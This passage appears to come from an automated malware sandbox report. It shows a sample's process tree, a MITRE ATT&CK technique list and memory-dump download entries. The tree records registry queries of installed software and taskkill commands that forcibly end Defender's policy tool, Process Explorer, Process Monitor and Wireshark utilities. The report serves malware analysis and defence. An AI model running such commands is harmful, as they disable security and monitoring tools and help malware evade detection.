    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:4368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:4388
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4408
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:4444
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:4464
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4484
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:4520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:4540
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4552
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4600
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:4656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:4672
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4692
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:4728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:4748
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4768
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:4804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:4824
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4844
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4904
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4968
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5032
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5092
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4152
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4240
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4312

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1748-83-0x00000281E3C60000-0x00000281E3C61000-memory.dmp

Filesize
4KB

Download
memory/1748-95-0x00000281E3F10000-0x00000281E3F11000-memory.dmp

Filesize
4KB

Download
memory/1748-76-0x00007FFFBC9F0000-0x00007FFFBD3DC000-memory.dmp

Filesize
9.9MB

Download